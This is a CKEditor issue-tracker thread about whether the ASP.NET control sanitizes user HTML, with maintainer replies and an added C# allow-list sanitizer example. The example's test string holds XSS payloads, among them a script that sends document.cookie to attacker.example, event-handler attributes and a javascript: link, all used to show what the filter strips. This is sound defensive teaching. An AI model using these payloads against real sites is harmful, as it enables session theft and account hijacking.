#14682 closed Task (wontfix)
Does CKEditor for asp.net do auto sanitization?
Reported by: | Furkan Gözükara | Owned by: | |
---|---|---|---|
Priority: | Normal | Milestone: | |
Component: | Server : ASP.Net | Version: | |
Keywords: | | Cc: | |
Description
I don't see anywhere to enable a sanitizer etc. in the CKEditor implementation.
How are we supposed to do sanitization?
Here is the implementation: http://docs.cksource.com/CKEditor_3.x/Developers_Guide/ASP.NET/Integration_Beginners
I am asking for asp.net
I have asp.net 4.5 and using c#
When we read and use it like this, does it do server-side sanitization?

```csharp
string str = CKEditor1.Text;                // raw editor content as posted
string str1 = Server.HtmlEncode(str);       // HTML-encode the content
string str2 = Server.HtmlDecode(str);       // decode the original content again
lblText.Text = str2;                        // assign the decoded content to the Label
```
Change History (6)
comment:1 Changed 8 years ago by
comment:2 Changed 8 years ago by
Resolution: | → wontfix |
---|---|
Status: | new → closed |
Version: | 4.5.10 (GitHub - master) |
No, there is none. As you probably know, there isn't any good library or standard for ASP.NET that does sanitization. This results in different approaches and also different requirements specific to the given application. This was the main reason why we haven't decided to introduce any such solution. Developers should do this on their own according to their needs.
NOTE: If you are familiar with JavaScript (even a little bit) and you don't have a requirement to use ASP.NET controls in your code, I would recommend switching to CKEditor 4.5.9 JavaScript. It takes less space and if you want to integrate it into your HTML page, the code to do that is even one line long, e.g.
```html
<script>
  var editor = CKEDITOR.replace('textarea-id');
</script>
```
or
```html
<script>
  var editor = CKEDITOR.replace('textarea-id', {
    // custom instance-specific configuration goes here
    lang: 'en',
    color: 'blue'
  });
</script>
```
comment:3 Changed 8 years ago by
j.swiderski, thank you for the reply. In this case, how can I safely print the client's response?
I mean I will use CKEditor for a private message system.
Assume that client A sent a malicious message to client B.
So how can I show this message safely to client B?
Thank you
comment:4 Changed 8 years ago by
CKEditor has nothing to do with sending data. I assume that data will be exchanged between clients through the server side, and this is the place where you should perform sanitization after receiving data from the client side.
From the CKEditor point of view you can use ACF, which allows you to define which tags, attributes, styles and classes can be used in the editor. For more information, please see:
http://docs.ckeditor.com/#!/guide/dev_acf
http://docs.ckeditor.com/#!/guide/dev_advanced_content_filter
http://docs.ckeditor.com/#!/guide/dev_disallowed_content
http://docs.ckeditor.com/#!/api/CKEDITOR.filter-method-addTransformations
http://docs.ckeditor.com/#!/api/CKEDITOR.config-cfg-allowedContent
http://docs.ckeditor.com/#!/api/CKEDITOR.config-cfg-extraAllowedContent
Please remember that ACF is not a security filter and you should never rely on JavaScript to do it. Such operations always need to be performed on the server side (even if you additionally do it on the client side). To summarize, you need to implement your custom code to do it.
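As an added example (not code from this ticket, the reporter, or the CKEditor project), here is what the server-side step described in the comment above could look like in ASP.NET 4.5 / C#. It assumes the HtmlAgilityPack NuGet package for HTML parsing; the `MessageSanitizer` class name, the allow-list, and the sample hostile message are all constructed for this illustration and are not part of any CKEditor API. It also shows why the encode-then-decode snippet from the ticket description does not help: the decode undoes the encode, so the Label receives the original markup.

```csharp
// Added example, not code from the ticket or the CKEditor project.
// Assumes the HtmlAgilityPack NuGet package (HtmlDocument/HtmlNode API).
using System;
using System.Collections.Generic;
using System.Linq;
using System.Net;
using HtmlAgilityPack;

public static class MessageSanitizer   // hypothetical name for this illustration
{
    // Allow-list: element -> attributes this message feature is willing to render.
    // Anything not listed (script, iframe, style, on* handlers, ...) is removed.
    private static readonly Dictionary<string, HashSet<string>> Allowed =
        new Dictionary<string, HashSet<string>>(StringComparer.OrdinalIgnoreCase)
        {
            { "p",      new HashSet<string>() },
            { "br",     new HashSet<string>() },
            { "b",      new HashSet<string>() },
            { "strong", new HashSet<string>() },
            { "a",      new HashSet<string>(StringComparer.OrdinalIgnoreCase) { "href" } },
        };

    public static string Sanitize(string untrustedHtml)
    {
        var doc = new HtmlDocument();
        doc.LoadHtml(untrustedHtml ?? string.Empty);

        // ToList(): the tree is mutated while it is walked.
        foreach (HtmlNode node in doc.DocumentNode.Descendants().ToList())
        {
            if (node.NodeType == HtmlNodeType.Text)
                continue;                   // plain text is kept as parsed
            if (node.NodeType == HtmlNodeType.Comment)
            {
                node.Remove();              // comments can smuggle markup past naive filters
                continue;
            }

            HashSet<string> allowedAttrs;
            if (!Allowed.TryGetValue(node.Name, out allowedAttrs))
            {
                node.Remove();              // unknown element: drop it together with its content
                continue;
            }

            foreach (HtmlAttribute attr in node.Attributes.ToList())
            {
                bool keep = allowedAttrs.Contains(attr.Name)
                    && !(attr.Name.Equals("href", StringComparison.OrdinalIgnoreCase)
                         && !IsSafeLink(attr.Value));
                if (!keep)
                    attr.Remove();          // on*, style, javascript: links, ...
            }
        }
        return doc.DocumentNode.InnerHtml;
    }

    // Accept relative paths and absolute http(s) URLs only.
    private static bool IsSafeLink(string href)
    {
        // Browsers strip tabs/newlines while parsing URLs, so "java\tscript:" is javascript:.
        if (string.IsNullOrWhiteSpace(href) || href.Any(char.IsControl))
            return false;
        Uri uri;
        if (!Uri.TryCreate(href.Trim(), UriKind.RelativeOrAbsolute, out uri))
            return false;
        if (!uri.IsAbsoluteUri)
            return href.IndexOf(':') < 0;   // relative, and nothing a browser could read as a scheme
        return uri.Scheme == Uri.UriSchemeHttp || uri.Scheme == Uri.UriSchemeHttps;
    }

    public static void Main()
    {
        // Constructed sample of what a hostile sender could submit through the editor
        // (ACF runs client-side, so the server cannot assume it filtered anything).
        const string hostile =
            "<p onmouseover=\"alert(1)\">Hi <b>Bob</b></p>" +
            "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>" +
            "<a href=\"javascript:alert(document.domain)\">click</a>" +
            "<a href=\"https://example.com/\">ok</a>" +
            "<!-- <img src=x onerror=alert(1)> -->";

        // 1) The snippet from the ticket description: decode undoes encode, so the
        //    Label would receive the hostile markup unchanged.
        bool unchanged = WebUtility.HtmlDecode(WebUtility.HtmlEncode(hostile)) == hostile;
        Console.WriteLine("encode+decode round-trip left input unchanged: " + unchanged);

        // 2) Encode only: safe to put in Label.Text, but tags show as literal text.
        Console.WriteLine(WebUtility.HtmlEncode(hostile));

        // 3) Allow-list sanitize on receipt, then store and render the sanitized string.
        //    In the page: lblText.Text = MessageSanitizer.Sanitize(CKEditor1.Text);
        Console.WriteLine(Sanitize(hostile));
    }
}
```

The design point is the allow-list: the sanitizer never tries to recognise dangerous constructs, it only keeps what the application has explicitly decided to render, so a new tag or attribute the author never thought of is dropped by default. Run it where the message is received from the sender, and render only the sanitized string to the recipient; `Label.Text` in Web Forms writes markup verbatim, which is exactly why the round-trip in step 1 is dangerous.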
comment:5 Changed 8 years ago by
Thank you for the answer. I see that CKEditor is useless for me because it doesn't provide any XSS security :(
comment:6 Changed 8 years ago by
CKEditor JavaScript is just a client-side application. The client-side protection can always be worked around, so even if you have super XSS protection implemented in your JavaScript, you still need to have protection on the server side.
OK, there is an ASP.NET control which could implement some server-side protection, but for the reasons mentioned in comment:1 we haven't decided to do so.
Additionally, your email never arrived at my Gmail. Probably your mail servers are blocked. Also for my Hotmail, it arrived in the spam folder.